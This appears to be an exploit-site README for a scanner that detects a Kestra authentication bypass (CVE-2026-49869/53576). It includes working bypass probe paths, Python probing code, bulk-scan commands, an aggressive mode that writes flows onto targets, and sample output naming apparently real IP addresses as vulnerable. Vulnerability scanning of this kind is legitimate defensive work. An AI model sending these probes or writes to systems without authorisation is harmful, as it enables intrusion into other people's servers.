## https://sploitus.com/exploit?id=47950A77-F41D-5310-A96F-B4B94D1E4D2F
# Kestra CVE-2026-49869 / CVE-2026-53576 Scanner

Scans Kestra instances for the `endsWith("/configs")` authentication-filter bypass. Kestra's `AuthenticationFilter.java` exempts a request from Basic-Auth when `request.getPath().endsWith("/configs")` is true, instead of matching the one intended public path `/api/v1/configs` exactly. Because Kestra addresses resources through caller-chosen path segments (namespace, flow ID), any request whose path ends in `/configs` skips authentication entirely, which allows unauthenticated flow creation and, through it, remote code execution. (CVSS 10.0)

**References:** [GHSA-5vc5-wxxq-3fjx](https://github.com/kestra-io/kestra/security/advisories/GHSA-5vc5-wxxq-3fjx) · [TP-2026-009](https://turingpoint.de/en/advisories/tp-2026-009/) · [CVE-2026-49869](https://vulners.com/cve/CVE-2026-49869) · [CVE-2026-53576](https://vulners.com/cve/CVE-2026-53576)

## Detection Logic

1. **Liveness check**: `GET /api/v1/configs` must return 200; otherwise the target is not treated as a live Kestra API and the scan stops.
2. **Auth check**: `GET /api/v1/{tenant}/flows` should return 401/403. If it does not, the instance is not enforcing authentication at all, so a bypass cannot be distinguished from open access.
3. **Bypass probes**: five GET requests to paths ending in `/configs`. If the auth check enforced but any probe returns a status other than 401/403, the instance is vulnerable. A 404 or 405 still counts: the request got past the filter and reached a controller instead of being rejected, which is why such rows appear as VULNERABLE in the bulk summary below.
4. **Aggressive mode** (`--aggressive`) additionally sends PUT requests to confirm that the bypass extends to writes. These create a flow and a KV entry on the target, so use them only where that side effect is acceptable.

### Probe Endpoints

| Probe | Method | Path |
|---|---|---|
| Flows | GET | `/api/v1/{tenant}/flows/{namespace}/configs` |
| Executions | GET | `/api/v1/{tenant}/executions/{namespace}/configs` |
| KV store | GET | `/api/v1/{tenant}/namespaces/{namespace}/kv/configs` |
| Dashboards | GET | `/api/v1/{tenant}/dashboards/configs` |
| Logs | GET | `/api/v1/{tenant}/logs/{namespace}/configs` |
| Flows PUT | PUT | same as Flows (creates a minimal flow) |
| KV PUT | PUT | same as KV (creates a KV entry) |
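As an added example (not the scanner's `main.py`, which this page does not reproduce), the Python below shows both halves of what the README describes: the suffix check the advisory attributes to `AuthenticationFilter.java` beside the exact-path check that closes the hole, and the step 1-3 verdict logic with the HTTP call injected so it runs offline. The short column names, the `http_status` helper and the precise SAFE/INCONCLUSIVE rules are my reading of the sample output, not something the page states.

```python
"""Added example, not the scanner's own code: the vulnerable vs. fixed auth
exemption predicate, and the detection verdict from the README steps 1-3.
Assumed (not from the page): http_status(), the column names, and the rule
that a target whose probes all errored is INCONCLUSIVE rather than SAFE.
"""
from __future__ import annotations
import urllib.error
import urllib.request
from typing import Callable, Optional

AUTH_CODES = {401, 403}            # what an enforcing filter answers
CONFIGS_PATH = "/api/v1/configs"  # the one endpoint meant to be public

# Probe paths from the README table, keyed by the bulk-summary column names.
PROBE_PATHS = {
    "Flows": "/api/v1/{tenant}/flows/{namespace}/configs",
    "Exec":  "/api/v1/{tenant}/executions/{namespace}/configs",
    "KV":    "/api/v1/{tenant}/namespaces/{namespace}/kv/configs",
    "Dash":  "/api/v1/{tenant}/dashboards/configs",
    "Logs":  "/api/v1/{tenant}/logs/{namespace}/configs",
}


def filter_exempts_vulnerable(path: str) -> bool:
    """Suffix check as described for AuthenticationFilter.java: any path
    ending in /configs skips Basic-Auth, including attacker-shaped ones."""
    return path.endswith("/configs")


def filter_exempts_fixed(path: str) -> bool:
    """Exact match: only the real public endpoint is exempt."""
    return path == CONFIGS_PATH


def build_probe_urls(base: str, tenant: str = "main",
                     namespace: str = "tutorial") -> dict[str, str]:
    base = base.rstrip("/")
    return {name: base + tmpl.format(tenant=tenant, namespace=namespace)
            for name, tmpl in PROBE_PATHS.items()}


def http_status(url: str, method: str = "GET",
                timeout: float = 8.0) -> Optional[int]:
    """HTTP status for url, or None on a transport error (the ERR column).
    Assumed helper; the scanner's own transport layer is not shown."""
    req = urllib.request.Request(url, method=method)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code
    except (urllib.error.URLError, OSError):
        return None


def verdict(liveness: Optional[int], auth: Optional[int],
            probes: dict[str, Optional[int]]) -> str:
    """VULNERABLE / SAFE / INCONCLUSIVE per the Detection Logic steps.
    404/405 from a probe is a bypass: the request reached a controller
    instead of being stopped by the auth filter."""
    if liveness != 200:
        return "INCONCLUSIVE"        # step 1: not a live Kestra API
    if auth not in AUTH_CODES:
        return "INCONCLUSIVE"        # step 2: auth not enforced, nothing to bypass
    answered = {n: s for n, s in probes.items() if s is not None}
    if not answered:
        return "INCONCLUSIVE"        # every probe errored
    if any(s not in AUTH_CODES for s in answered.values()):
        return "VULNERABLE"          # step 3
    return "SAFE"


def scan(base: str, fetch: Callable[[str], Optional[int]] = http_status,
         tenant: str = "main", namespace: str = "tutorial") -> dict:
    """Run steps 1-3 against base using the supplied fetch callable."""
    base = base.rstrip("/")
    liveness = fetch(base + CONFIGS_PATH)
    auth = fetch(f"{base}/api/v1/{tenant}/flows")
    probes = {n: fetch(u) for n, u in
              build_probe_urls(base, tenant, namespace).items()}
    return {"liveness": liveness, "auth": auth, "probes": probes,
            "verdict": verdict(liveness, auth, probes)}


if __name__ == "__main__":
    import sys
    print(scan(sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:8080"))
```

Passing a dict's `.get` as `fetch` reproduces any row of the bulk summary without touching the network, which is a convenient way to pin the verdict rules down in a unit test before pointing the scanner at real hosts.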

## Usage

```bash
# Single target
python main.py http://target:8080

# With explicit port (skips auto-expand)
python main.py http://10.0.0.1:8080

# Bulk scan
python main.py -f targets.txt

# Bulk scan with JSON output
python main.py -f targets.txt -j -o report.json

# Aggressive mode (PUT probes)
python main.py -f targets.txt --aggressive

# Custom tenant (older Kestra uses "default")
python main.py http://target:8080 --tenant default

# Custom thread count
python main.py -f targets.txt --workers 20

# Custom auto-ports
python main.py -f targets.txt --auto-ports 8080 9090

# Verify TLS
python main.py https://kestra.example.com --verify-ssl
```

### Input File Format

```
# Comment lines ignored
103.112.186.15:8080
http://103.112.186.15:8080/ui/
https://kestra.example.com
103.112.186.24           # No port → auto-expanded across common ports
```

Lines without a port are auto-expanded across `[8080, 8081, 8088, 8091, 80, 443]`.
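As an added example (not the scanner's own loader), the following Python parses the input file format above into scan base URLs. It assumes, beyond what the page states, that a line carrying a scheme but no port uses that scheme's default port and is not expanded, that a bare `host:port` gets `http://`, that port 443 expands as `https://`, and that trailing `# ...` comments and duplicate targets are dropped. The sample file is constructed from the lines shown above.

```python
"""Added example, not the scanner's code: target-file parser for the input
format in the README. Assumptions (mine): scheme without port is not
expanded; bare host:port gets http://; 443 expands as https://; trailing
'# ...' comments are stripped; duplicates dropped, order preserved.
"""
from __future__ import annotations
from urllib.parse import urlsplit

AUTO_PORTS = (8080, 8081, 8088, 8091, 80, 443)  # expansion list from the README


def _scheme_for(port: int) -> str:
    return "https" if port == 443 else "http"


def normalize_target(line: str, auto_ports=AUTO_PORTS) -> list[str]:
    """One input line -> zero or more base URLs of the form scheme://host[:port]."""
    text = line.split("#", 1)[0].strip()      # drop comments and blanks
    if not text:
        return []
    if "://" not in text:
        text = "//" + text                   # let urlsplit see a netloc
    parts = urlsplit(text)
    host = parts.hostname
    if not host:
        return []
    if ":" in host:                          # IPv6 literal needs brackets back
        host = f"[{host}]"
    try:
        port = parts.port                    # raises ValueError on "host:abc"
    except ValueError:
        return []
    if port is not None:                     # explicit port: no expansion
        return [f"{parts.scheme or _scheme_for(port)}://{host}:{port}"]
    if parts.scheme:                         # scheme given: its default port
        return [f"{parts.scheme}://{host}"]
    return [f"{_scheme_for(p)}://{host}:{p}" for p in auto_ports]


def parse_targets(text: str, auto_ports=AUTO_PORTS) -> list[str]:
    """Whole file -> de-duplicated list of base URLs in first-seen order."""
    seen: set[str] = set()
    out: list[str] = []
    for line in text.splitlines():
        for url in normalize_target(line, auto_ports):
            if url not in seen:
                seen.add(url)
                out.append(url)
    return out


# Constructed sample mirroring the README's Input File Format section.
SAMPLE = """# Comment lines ignored
103.112.186.15:8080
http://103.112.186.15:8080/ui/
https://kestra.example.com
103.112.186.24           # No port -> auto-expanded across common ports
"""

if __name__ == "__main__":
    for url in parse_targets(SAMPLE):
        print(url)
```

Note that the two `103.112.186.15` lines collapse into one target, and that the bare host on the last line becomes six targets; a bulk file of bare hosts therefore costs six times the requests, which is worth knowing before setting `--workers`.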

## Output

### Single Target

Full per-probe breakdown with verdict:

```
====================================================================
  Target:    http://10.0.0.1:8080
  Timestamp: 2026-06-30T12:00:00+00:00
====================================================================

  [Flows Bypass]
    URL:         http://10.0.0.1:8080/api/v1/main/flows/tutorial/configs
    Status:       200
    Bypass:      YES

  [Exec Bypass]
    URL:         http://10.0.0.1:8080/api/v1/main/executions/tutorial/configs
    Status:       404
    Bypass:      No

  ...

  [VULN]  Verdict: VULNERABLE ...
```

### Bulk Summary

Sorted columnar table (vulnerable first, then inconclusive, then safe):

```
====================================================================================================================
  BULK SCAN SUMMARY   GHSA-5vc5-wxxq-3fjx
====================================================================================================================
  #    Target                              Auth    Flows    Exec     KV      Dash    Logs    Status
  ----------------------------------------------------------------------------------------------------
  1    http://173.249.1.26:8080            401     404      ERR      ERR     ERR     405     VULNERABLE
  2    http://207.180.207.199:8080         401     404      ERR      ERR     ERR     405     VULNERABLE
  ...
  30   http://103.115.65.228:8080          401     401      ERR      401     ERR     401     SAFE
  ...
====================================================================================================================
  Total: 258  |  Vulnerable: 5  |  Safe: 29  |  Inconclusive: 224
====================================================================================================================
```

Exit codes: `0` = no vulns, `1` = vuln found, `2` = all inconclusive.

## Installation

Requires Python 3.10+.

```bash
pip install -r requirements.txt
python main.py --help
```

## Disclaimer

For **authorized defensive testing only**. Always obtain proper written authorization before scanning systems you do not own.